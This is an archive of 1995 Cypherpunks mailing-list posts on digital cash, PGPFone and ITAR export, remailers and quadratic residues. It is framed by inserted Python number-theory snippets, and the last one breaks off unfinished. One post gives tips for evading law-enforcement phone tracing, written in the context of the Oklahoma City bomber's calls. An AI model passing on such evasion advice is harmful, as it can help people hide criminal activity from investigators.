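    pairs = product(sqrt_mod_prime(a, p), sqrt_mod_prime(a, q))
    return sorted({crt_pair(rp, p, rq, q) for rp, rq in pairs})


def factor_from_roots(r1, r2, n):
    """Given two roots of the same square mod n, return a nontrivial factor
    of n when r1 != +/- r2 (mod n), otherwise None."""
    g = gcd(r1 - r2, n)
    return g if 1 < g < n else None


if __name__ == "__main__":
    print("roots of 8^2 mod 7: ", sqrt_mod_prime(8 * 8, 7))
    print("roots of 8^2 mod 5: ", sqrt_mod_prime(8 * 8, 5))
    print("roots of 29 mod 35: ", sqrt_mod_pq(29, 7, 5))
    print("factor from 8 and 13:", factor_from_roots(8, 13, 35))
```
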




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 14 Aug 95 13:54:47 PDT
To: perobich@ingr.com
Subject: Re: An article for Wired magazine
In-Reply-To: <199508142009.AA07344@poboy.b17c.ingr.com>
Message-ID: <199508142054.OAA18740@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

> True. On the other hand, many of these other companies are actually doing
> commerce Right This Minute. As a vendor, my primary interest is availability.


I understand what you mean, although *my* primary interest is 
techno-enthusiasm and near-future sociological speculation.  :-)


> Digicash stands to lose out in the marketplace. Why? Because you can't
> actually buy and sell real goods for real cash right now. One day,
> sure, but not now. By the time they deploy their system, consumers who
> aren't as concerned, or knowledgeable, as cypherpunks will have made
> some other system the market leader.


I'm afraid these words will turn out to be prophetic.  On the other hand, the
nature of this market is such that the industry leadership can turn-over
quickly.  I expect that the factor which has the most inertia in this game is
consumer mind-share.  The other factors-- capital, technology, skilled labor,
publicity-- can all be quickly gained by any aggressive new start-up that
wants them.


> Chilling thought. I hope DC can get a backing bank sometime soon.


According to Steven Levy (in his Wired mag story on David Chaum), Chaum
refuses to make deals with companies that would cut corners on his privacy
provisions.  I don't know how accurate that story is, but if it is true it
would explain why DigiCash is the technological leader and the marketplace 
dark horse.


(Hm.  "DC" -- "DigiCash" -- "David Chaum".  I just noticed that...)


Bryce
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMC+3wvWZSllhfG25AQGjQgP/dhMWwEEPasttIs/RvkNFA6qRUS9A/7F2
96QvWhA9vetBq97LmwWZxluxw8VgPUoJyltX+eVOHt+JCeDy36rxOhcMe2hH1Z8B
qGZUcwpZ8IUIxkq43SQ0M+MqWyEWRn/0c9vNxu39o7CnOQWIZPfjdSp0CtRdjmu2
E0ypPAFV73c=
=uynK
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dochobbs@wwa.com (Michael D. Hobbs)
Date: Mon, 14 Aug 95 13:03:24 PDT
To: cypherpunks@toad.com
Subject: Re: My pseudo-anonymous dream list
Message-ID: <m0si5j5-000FcVC@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary wrote,

	I would add a few more suggestions of my own to your wishlist.

	11)  Seamless integration with existing mail programs, such as Eudora.

what about...pine, pegasus, sendmail, airmail, news mail programs... I think
this would be up to the individual user or for someone to develop the perfect
pgp mail program.

	12)  Notification that your message has been received (I'm not sure how to
	do this and maintain anonymity)

I don't know either if you chain your mail before it gets to the nym server.
The idea of chaining is to keep the sender anonymous.  Maybe if the nym
server sends mail to your reply block every time your alias and password are
used to send mail.  Though it would have to be something like "your alias has
sent mail to the following xxx@xxx.xxx".

	13)  Ability to handle very large encrypted files (binaries).

Why?  I think this would either

1) cripple the server from the load

2) make it easier to track back to the sender. If you are comparing 1 meg
   files against 1000 byte files it would be much easier to filter out what
   you are not looking for.

3) give anon mailers the reputation of porn/warez/church of scientology
   document distributors and not privacy mailers which defeats some of the
   things that are trying to get done.

	14)  Perhaps increasing security by breaking messages into several parts,
	routing them through different chains, and reassembling them just prior
	to transmission to recipient.

Ouch.  I think that would be hard to manage :)  Can you imagine thousands of
users sending tens of thousands of messages a day and having more than one
remailer having to keep track of hundreds of thousands of 'chunks' of mail.
That would start to resemble tcp/ip in complexity.



	Keep up the good work!

The concepts are good, I just don't think the implementation would be very
easy.
You should sign up on the nym server mailing list that was posted here a few
days ago if you are interested in pursuing these ideas.

_____________________________________________________________
dochobbs@wwa.com	M.D. Hobbs	mhobbs@rad.rpslmc.edu
http://miso.wwa.com/~dochobbs		finger for my pgp key
I am human and nothing human do I count alien.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 14 Aug 95 12:08:35 PDT
To: David Neal <dneal@usis.com>
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <Pine.BSI.3.91.950811164809.28774C-100000@usis.com>
Message-ID: <Pine.SUN.3.91.950814150605.13851A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Aug 1995, David Neal wrote:

> On Fri, 11 Aug 1995, Vladimir Z. Nuri wrote:
> > when someone invents cheap hardware that you can just plug
> > on top of any existing phone, i.e. "the phone adaptor", TPA?,
> > *that's* when the world is going to go crazy with crypto.

> It's closer than you think.  I've been messing with TI's 
> Digital Signal Processing DSK.  For $99 you get a DSP
> with audio in, audio out and 10k of memory.  Reference
> implementations of : DTMF encoders/decoders; 300, 1200, 2400 baud
> modem programs; and voice processing software already exist.

It would be interesting to create a hardware device which is 
interoperable with PGPFone but uses a DSP chip and a slower control 
processor.  I can easily imagine $100-$150 as a reasonable range.

I will be really curious to see what kind of voice coder they are using 
in PGPFone...I assume it is some flavor of CELP.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Mon, 14 Aug 95 13:19:58 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: An article for Wired magazine
In-Reply-To: <199508141914.NAA16529@nagina.cs.colorado.edu>
Message-ID: <199508142009.AA07344@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Furthermore none of DigiCash's competitors, as far as I have been able to
> learn, offer any kind of anonymity the way DigiCash does.  The closest they
> come is "confidentiality".  Yeah-- right.  I can get the same offer from the
> Ministry of Truth.

True. On the other hand, many of these other companies are actually doing
commerce Right This Minute. As a vendor, my primary interest is availability.

Digicash stands to lose out in the marketplace. Why? Because you can't
actually buy and sell real goods for real cash right now. One day,
sure, but not now. By the time they deploy their system, consumers who
aren't as concerned, or knowledgeable, as cypherpunks will have made
some other system the market leader.

Chilling thought. I hope DC can get a backing bank sometime soon.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC+taqfb4pLe9tolAQE0igP/bAT0EidHjONMjmjXmy5AZLCKzj3TM1U0
qPIZR72noaL6YeUQKig9u9DLRe3tSMz9sobSqZuOguapiTP/ZhusoaOVUwxsdgQe
SWtJwgIaMzESZr1lWihUyCopvKiHZmlyCX/3pnpKyubWcCa2lNn9crgzkof1BgVV
vIw6S16waSU=
=00jq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 13 Aug 95 22:11:42 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Why break ITAR? (was: Bet e$ on how long it will take for PGPFone to make it overseas!)
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <199508140509.PAA22562@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com
  and shamrock@netcom.com (Lucky Green)

...
> Still, I have the feeling that
> some irresponsible cyphercriminal will break US law and export PGPFone
> anyway.
...

Fi! You would not suggest that anyone would do that, would you?

There are other ways to get it out, no? For instance, shortly after it
is out, call the police stating that your home was burgled.

Items missing? A few disks of publicly-available freeware.

So what? *The Security of the Nation is at risk!*


Good luck!

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Mon, 14 Aug 95 13:47:37 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950814154154.3940F-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 13 Aug 1995, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To loosen up the often so serious discussions on the list, I propose a
> little game. PGPFone's release is about a week away. PRZ is trying his
> hardest to keep it from being exported. Still, I have the feeling that
> some irresponsible cyphercriminal will break US law and export PGPFone
> anyway. Let us bet cyberbucks on how long it will take for this crime to
> happen. Here is my initial offer:
> 
> I bet e$50 that PGPFone will have been exported 24 hours after its final
> release has been announced to this list. Who is willing to take the bet?
> Perhaps someone is willing to bet at less time?
> 
> Have fun,
> 

This is a sucker bet ... more appropriate would be that you bet it will
take longer than X amount of time. Verification would be tricky too.

-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 14 Aug 95 13:00:26 PDT
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Are we forming the "social sector"?  FYIntrospection...
Message-ID: <v02120d02ac555af585f8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>        "the post-capitalist polity needs a 'third sector,' in addition
>        to the two generally recognized ones, the 'private sector' of
>        business and the 'public sector' of government.  It needs an
>        autonomous social sector." (Drucker 1993)

This is a quote from the following:

"The Age of Social Transformation", Peter Drucker, _The Atlantic Monthly_
11/94, pp 53-80.

... which I just read this weekend, coincidentally.  Yes, it's statist.
Still, it's a good read. I learned something from it, even if I found
myself talking back a little. ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Mon, 14 Aug 95 13:08:32 PDT
To: gnu@toad.com
Subject: Re: Are we forming the "social sector"?  FYIntrospection...
Message-ID: <9508142008.AA23481@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Mon Aug 14 15:48:43 1995
|   Subject: Are we forming the "social sector"?  FYIntrospection...
|   Sender: owner-cypherpunks@toad.com
|
|   [ ... ]
|   
|           "the post-capitalist polity needs a 'third sector,' in addition
|           to the two generally recognized ones, the 'private sector' of
|           business and the 'public sector' of government.  It needs an
|           autonomous social sector." (Drucker 1993)

Not to start a holy war (no pun intended) but isn't this the role that
according to Locke, et al., was supposed to be filled by Religion? A
moral/social force standing beside government and economics? If Dr.
Johnson had been less immersed in the idea of Truth, I believe he
would have agreed. He wrote for money, hobnobbed with royalty for
status, and was driven by a need to prove himself worthy in the eyes
of his Maker.

I can't stand the perspectives that come out of this "we're so objective
we ignore anything that reeks of irrationality" stance. By restricting
themselves to the projection of history that results, they can't see the
ways in which the things they deny have been the major players in the
situation they claim to understand. "Post-capitalist polity"? What the
hell is this guy smoking? 

I say this not to advance the role of religious fundamentalism, but as
a reminder of the past and an earnest attempt to get people to recognize
that like it or not, religion (however you may conceive it) is already
there. You could argue that people go into government for power and business
for money, and whatever is left over constitutes their religious frame.

Charles Winquist, a professor of the philosophy of religion at Syracuse,
calls religion that which defines what is "real and important" for a
person, a culture, or a nation. I would argue that once you abstract
out the money and power aspects of this, you are left with exactly what
this guy Drucker is trying to say we need. And we already have it.

I like to write good code and do intelligent Web site design. And I
don't do it for Jesus, or Buddha, or Rev. Moon. I do it because it is
what gives my life a sense of reality, and because it is what I have
determined to be important right now. I also pay attention to issues
such as are discussed here (excepting the conspiracy crap) because I
can see that it will be important to me and others.

Just my $.02,
Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Matonis <74774.3663@compuserve.com>
Date: Mon, 14 Aug 95 14:35:53 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: An article for Wired magazine
Message-ID: <950814205254_74774.3663_EHL102-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


This is so that you have the complete context of the post.


---------- Forwarded Message ----------

From:	Jon Matonis, 74774,3663
TO:	Electronic Cash (post), INTERNET:ecm@ai.mit.edu
DATE:	8/14/95 11:10 AM

RE:	Copy of: Re: An article for Wired magazine

Robert Hettinga (rah@shipwright.com) wrote:

>My point is that there isn't e$ denominated in a government's currency,
>more to the point, a popular currency like dollars or marks, or yen.  That
>would make it possible for me to pay a dollar on the net for goods worth a
>dollar. That's what I meant by "real" currency.  What we have are unique
>digital certificates with indeterminate lifetimes which have no nominal
>value except what people are willing to pay for them in the open market.
>This is fine. In fact it's pretty cool that people are willing to impute
>value to them by buying and selling them exclusive of any other economic
>backing.

Since this is for a magazine article, I want to clear up some misconceptions.
The e$ experiment as conducted by DigiCash has broader implications, which the
article may or may not decide to address.

First of all, digital money can take various forms.  Existence on a hard drive
is one of those forms.  But, it is also possible to have digital money on a
card-based platform. Mondex in the UK currently has official government units of
account digitally represented for their Mondex card trial in Swindon.  They have
also announced that in the future this card will hold up to five "official"
currencies.  Furthermore, they make no secret about the fact that this digital
money is ideally suited to transfer on the Net.  Visa and Mastercard are both
working on stored-value cards which will also digitize official currencies.
CyberCash has also announced plans for an electronic token which will most
likely represent an official currency.  Others will announce soon.

Even DigiCash, in its own material, states that they are only the supplier of
technology.  This cyberbuck experiment was to demonstrate that technology --
primarily to banks.  They don't intend to be in this business as the monetary
supplier.  So, the e$ technical experiment served its purpose.  It was unbacked
because that was not what they were promoting.  Banks, as licensees, will
perform the monetary functions and they will undoubtedly issue digital money at
par with governmental units of account.  The trend here is definitely towards
"official" currencies and that will give digital money the trustworthiness and
familiarity which it needs so desperately for acceptance.

But that is not to say that this is the preferred course.  Other trustworthy,
brand-name issuers (non-banks, i.e., Coca-Cola, AT&T, United Airlines, Fidelity
Investments)  with similar technology (or ones that license it) can certainly
monetize any bearer instruments and then digitize those instruments for the
purpose of a negotiable unit of value.  I argue that this is the preferred
course because it will eliminate the reliance on banks (and central banks) and
speed up considerably the proliferation of digital money for the benefit of all.
Stand-by though:  governments and central banks will do everything in their
power to discourage and prevent this for the power to issue and coin money is
one of THE most cherished privileges of the Crown !

This WiReD article is just the beginning !

Jon W. Matonis





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 14 Aug 95 13:59:32 PDT
To: cypherpunks@toad.com
Subject: Phone Card Risks
Message-ID: <199508142054.QAA23629@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the plethora of TV Magazine shows featured Tim McVeigh and phone
cards last week.  Maybe I should post to Risks.

According to the story, Tim McVeigh bought a bunch of phone cards from "The
Spotlight" (famous Klan paper) which carried the Spotlight brand name.  He
made lots of calls.  

Later, the Fibbies who checked all the phone records for room and pay phones
at the motels where TM was staying came up with lots of calls to the 800
number of the vendor who was actually switching calls for the Spotlight
phone cards.  The vendor found the card number(s) that matched those calls
and all the other calls that matched those card numbers.  

They made it seem like such a match was a big thing.  Perhaps their
transaction database was not well developed.  In any case, they wrote a
little software and gave the Fibbies a list of all of TM's calls.

There are supposed to be lots of calls to fertilizer dealers, his sister,
and others.  Very interesting.

This is an obvious risk in the use of phone cards that anyone should be able
to figure out for themselves since it is the same risk that pay phones have
always had.  If the Fibbies can find out what telephones you have used, they
can get those records and trace things from there.  This problem has
occurred before for "right wing" nuts and the Mafia.  Several years ago
after members of The Order robbed an armored car in northern California, the
Fibbies found a nearby motel where a bunch of suspicious characters had all
stayed together and traced calls from the pay phone outside to various
wives/girl friends and broke the case from there.  Likewise Mafiosi in their
NYC social clubs have often shown bad phone habits using the nearest pay
phone, etc.  If a pay phone is used enough and well-enough known to the
Fibbies, it even becomes worthwhile to tap it.

So buy lots of phone cards from different dealers (*never* The Spotlight),
use phones unconnected to you, don't make too many calls from the same phone
or using the same card, and be sure to destroy the card preferably before
you use it (the only significant thing about phone cards are the numbers
which can be stored in an encrypted file).  

An easy way to accomplish much of the above is to hang out in big cities
instead of the boonies.  It's a lot easier to find an unlinked phone
(unlinked to you, that is) in the city than in the country.

DCF

"'Well, he hit what he was aiming at.'  Marine DI discussing the fact that
the guy up in the tower at the University of Texas shooting people was an
ex-Marine."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 14 Aug 95 17:54:44 PDT
To: cypherpunks@toad.com
Subject: Name Overloading
Message-ID: <ac553e9e03021004156a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:54 PM 8/14/95, Bryce Wilcox wrote:

>(Hm.  "DC" -- "DigiCash" -- "David Chaum".  I just noticed that...)

Also "Dining Cryptographers," as in "DC-Nets," which DC invented.

Chaum only smirks when asked about this multiple overloading.

--Tim May, aka Marcus Registrada

(overloaded with Trade Mark, Turing Machine, and maybe other things...)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Mon, 14 Aug 95 17:22:46 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Phone Card Risks
In-Reply-To: <199508142054.QAA23629@panix.com>
Message-ID: <Pine.BSI.3.91.950814191418.25132D-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Aug 1995, Duncan Frissell wrote:
> 
> This is an obvious risk in the use of phone cards....

And up here in Minneapolis, ALMOST ALL of the central city
area pay phones are now rigged so they will not accept change
between 11 PM and 7 AM. Forewarned is forearmed.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Mon, 14 Aug 95 17:59:44 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: votelink - some discussions on Phil Z & ITAR
In-Reply-To: <20548.9508141111@exe.dcs.exeter.ac.uk>
Message-ID: <9508150059.AA12545@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


aba@atlas.ex.ac.uk writes
>They were alarmed by the implication that their WWW server now
>contained PGP code which they did not feel qualified to judge the
>implications, or correctness of.  This prompted the posting to the
>forum of a rather worried sounding disclaimer by a votelink
>representative, to the effect that they were abiding by the Prodigy
>ruling, and so felt unable to remove the offending piece of ITAR
>breakage, and yet felt rather uncomfortable with its presence.

Interesting reaction, if I understand it rightly... "We're afraid
that having less than two tenths of a percent of PGP on our system
causes us to violate ITAR, but we're also afraid to remove it because
it may constitute 'moderation' of the discussion and thereby open us
to liability."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 14 Aug 95 17:11:34 PDT
To: cypherpunks@toad.com
Subject: Request for Cypherpunks to CU-SeeMeize mbone video
Message-ID: <Pine.SUN.3.91.950814200851.14005B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



A while back someone mentioned that they would be videocasting a 
Cypherpunks meeting over the MBONE.

While the MBONE is great for many of us, CU-SeeMe would provide a much 
larger audience.

Check out http://www.umich.edu/~dschluss/nv-cusm.html for information on 
how to forward MBONE video to a CU-SeeMe reflector.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Mon, 14 Aug 95 18:45:09 PDT
To: cypherpunks@toad.com
Subject: e$: Reuters Smells the Coffee + (cyphergroupie confession)
Message-ID: <199508150140.AA05322@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I might as well confess now and get it over with. Yes I am a cyphergroupie.

I do write code, but it is not cypher-code, however I do get paid for it,
which along with taking care of my family consumes most of my time.

I have a sliver of time that I can devote to reading mailing lists and 
newsgroups from the internet. If you will indulge me, I write this letter
for my own amusement and with the hope that it may spark some interest.

> Date: Sat, 12 Aug 1995 10:05:35 -0400
> From: rah@shipwright.com (Robert Hettinga)
> Subject: e$: Reuters Smells the Coffee
> 
> 
> --- begin forwarded text
> 
> Mime-Version: 1.0
> Date: Sat, 12 Aug 1995 00:01:58
> From: infocker@megaweb.com
> Sender: infocker@megaweb.com () (from unknown.aol.com 205.188.2.111)
> To: www-buyinfo@allegra.att.com
> Subject: Cyber Economy--Govts. Cannot Control
> 
> Thought Mr. Hettinga might particularly appreciate this perspective.
> 
> Jim Rapp
> Alexandria, Virginia
> "give me more info"
> 
> As always, do not send the copyright police after me.
> 
> 
> LONDON - Growing business on the Internet computer network could
> allow companies and individuals to avoid taxes and build up a black
> economy increasingly out of range of government intervention and
> regulation, computer experts say.
>
[snip]
> 
> "Electronic purses," loaded from banks down telephone lines,
> could become the favored means of payment for fast, anonymous and
> secure payments, with currencies of choice becoming more exotic,
> depending on what is acceptable to dealmakers.

Hmm, lately I have seen an advertisement on TV from a credit card
company (it might be CitiBank, I don't recall) describing a new style of
credit card (Ringo Starr is the spokesman for the card).

Its name is "Private Issue". According to the ad you can pick your
card design (the picture background of the card), and your billing
date.

After seeing this "e$: Reuters Smells the Coffee" post I wonder if
the Bank/Credit-Card company is easing customers into thinking of
private issue cash/credit as a Good-Thing(tm), or it may just be
some sort of marketing gimmick to sell more credit cards. However,
I do find the choice of name interesting - "Private Issue".

The recent issue of Extropian Magazine (ya, they can be a little kooky,
usually there is something interesting said in the magazine), featured a
discussion of the privatization of money (with references to Hayek's book
The Denationalization of Money) and its "compatibility" with ecash. When
I first heard about the concept of privatizing money I thought it could
not be done. But lately I have been wondering if it is possible to "sell
the idea", especially after seeing the "Private Issue" ad.

If you pitched ecash the right way it is possible that it could catch
on. I think that the most important part of selling the private currency
to small businesses would be if the ecash "works" just like credit
cards. If anyone out there is thinking of a real 'private issue', I
think that this is one of the most important design features for the
potential private currency.

What I mean by "works" like credit cards is not the transaction tracking
bookkeeping part, but the physical handling of the transaction at the
point of sale. I envision a card reader machine that you run a magnetic
strip card through. The machine reads/writes the ecash card, does whatever
cryptographic steps are necessary to complete the transaction, and the
card is handed back to the customer. Credits are transmitted to the ecash
bank/currency issuer and the clerk hands the customer a receipt. It would
also be good if the card reader machine could also process transactions
with traditional credit cards.

You could even have a logo sticker that you put on your shop window to
show that you will accept that "new kind of credit-card".

Is the bank/credit-card company laying the marketing ground work for a
private currency based on ecash?  If it is, it is an interesting way of
selling the concept, making it a COOL RAD - avant garde thing to use.

Other selling points of a private issue could be lack of inflation, better
interest rates and possible tax advantages. Of course the issuer would have
to be trustworthy (or at least more trustworthy than the guverment!).

Signing off, while shopping for Cayman Islands bank services...

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agent@agents.com
Date: Mon, 14 Aug 95 21:05:25 PDT
To: cypherpunks@toad.com
Subject: You are being monitored
Message-ID: <199508150404.AAA04907@qks.com>
MIME-Version: 1.0
Content-Type: text/plain



If anybody can determine who this came from pleez post a guess.

This is an experiment from inside a program environment. I am serious.



-- Tim May




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 14 Aug 95 21:23:48 PDT
To: cypherpunks@toad.com
Subject: Re: You are being monitored
Message-ID: <ac556f2801021004b2f7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 PM 8/14/95, agent@agents.com wrote:
>If anybody can determine who this came from pleez post a guess.
>
>This is an experiment from inside a program environment. I am serious.
>
>
>
>-- Tim May

Well, never mind, I guess. I don't think I added this, but I guess I did.
So much for my experiment.

My new SmalltalkAgents environment has a method for mailing from within a
program environment, if a TCP/IP connection is open. This allows Smalltalk
programs to directly send mail. On a Macintosh, this is not so trivial.

The manufacturer is apparently acting as the collection point, and any name
can be put into the From: field.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 14 Aug 95 18:59:41 PDT
To: cypherpunks@toad.com
Subject: Re: An article for Wired magazine
In-Reply-To: <199508142009.AA07344@poboy.b17c.ingr.com>
Message-ID: <9508150158.AA12834@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I'm less worried about the anonymity aspect than the security aspect. The 
reported Mondex approach is less than impressive. 

The major problem with DigiCash is the patent portfolio. I don't much like the 
idea of David Chaum replacing the government as the controller of the money 
supply. Sorry, I just don't.

The problem with Chaum's work is that it is unbalanced. He considers only the 
privacy aspect. The prevention of extortion aspect he does not consider. 
DigiCash have never addressed the baby-napping protocol problem as far as I am 
aware.

Governments have certain rights in our society that individuals do not. This is 
justified by their being democratically accountable. I don't think we should 
readily agree to surrender those rights. Do you want the world of the future to 
be controlled by Bill Gates, Ted Turner and David Chaum?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klbarrus@infocom.net (Karl L. Barrus)
Date: Mon, 14 Aug 95 20:25:50 PDT
To: cypherpunks@toad.com
Subject: Re: Q's on Number Theory/Quadriatic Residues
Message-ID: <199508150325.WAA08157@infocom.net>
MIME-Version: 1.0
Content-Type: text/plain


>How are these square roots?  9 is certainly not the square root of 11, nor is
>8 the square root of 29, even modulo 35.  

What this means is that 9^2 mod 35 = 11, and 8^2 mod 35 = 29.  See the list
right above the chart that is confusing you.

For example, it lists x^2 = 29 mod 35 has a solution: x = 8,13,22,27

So actually there are 3 other solutions... 13, 22, and 27 are also square
roots of 29 mod 35.

>[ 1/v vs. v-1]
>Are these two expressions interchangeable

Yes.

>3)Speaking of errata, where can I find a copy?

Hm... I forgot.  I have one somewhere and will send it along if I find it.

>Is it possible to predict the possible quadratic residues, or is an

Yes, you can use the Jacobi symbol to determine if a is a quadratic residue
mod n.  See page 207.

>5)From what does Feige-Fiat-Shamir derive its security?

Difficulty of factoring.
--
Karl L. Barrus <klbarrus@infocom.net>
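
Added example (not part of the original message): a brute-force check of the square roots quoted above, next to a Jacobi symbol routine. For a composite modulus such as 35 the Jacobi symbol settles only one direction: -1 proves a non-residue, while +1 still needs the factors 5 and 7 to confirm, which is where the dependence on factoring shows up. All function names are illustrative.

```python
from math import gcd


def jacobi(a: int, n: int) -> int:
    """Jacobi symbol (a/n) for odd n > 0, by the binary reciprocity algorithm."""
    if n <= 0 or n % 2 == 0:
        raise ValueError("n must be a positive odd integer")
    a %= n
    result = 1
    while a:
        while a % 2 == 0:              # pull out factors of two: (2/n) rule
            a //= 2
            if n % 8 in (3, 5):
                result = -result
        a, n = n, a                    # quadratic reciprocity swap
        if a % 4 == 3 and n % 4 == 3:
            result = -result
        a %= n
    return result if n == 1 else 0     # 0 when gcd(a, n) > 1


def square_roots(a: int, n: int) -> list:
    """All x in [0, n) with x^2 = a (mod n); brute force is fine for small n."""
    return [x for x in range(n) if (x * x - a) % n == 0]


def is_residue(a: int, prime_factors) -> bool:
    """Quadratic residuosity of a unit a modulo a product of distinct odd
    primes, using Euler's criterion on each prime factor separately."""
    return all(pow(a % p, (p - 1) // 2, p) == 1 for p in prime_factors)


def jacobi_false_positives(n: int, prime_factors) -> list:
    """Units with Jacobi symbol +1 that are nevertheless not squares mod n."""
    return [a for a in range(1, n)
            if gcd(a, n) == 1
            and jacobi(a, n) == 1
            and not is_residue(a, prime_factors)]


if __name__ == "__main__":
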